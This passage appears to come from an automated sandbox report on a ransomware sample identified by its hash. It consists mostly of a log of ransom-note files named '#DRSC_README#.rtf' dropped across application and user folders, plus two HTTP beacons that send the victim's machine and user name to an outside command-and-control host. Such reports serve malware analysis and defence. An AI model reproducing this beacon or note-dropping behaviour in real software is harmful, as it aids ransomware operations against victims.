(x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Desktop\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\etc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe HTTP URL 29 http://sec.timerz.org/addrecord.php?apikey=drsc_api_key&compuser=LZUKLIOU|Admin&sid=mmQLNZP1fpiDWOAf&phase=[ALL]0F8D0919EAEB6D73 Process not Found File created C:\Program Files\Java\jdk1.8.0_66\db\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Pictures\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uz-Latn-UZ\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ar-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-sl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\uninstall\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ja\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iq5q997v.default-release\datareporting\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe HTTP URL 10 http://sec.timerz.org/addrecord.php?apikey=drsc_api_key&compuser=LZUKLIOU|Admin&sid=mmQLNZP1fpiDWOAf&phase=START Process not Found File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mt-MT\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nb-NO\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-TW\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\include\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tk-TM\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\el\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\wo\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{236341fa-7ef4-4d1c-ad26-f62f16dcfc1d}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Searches\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-RS\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\Windows Security Health\Logs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mi-NZ\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Music\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280807\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Extras\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Layouts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 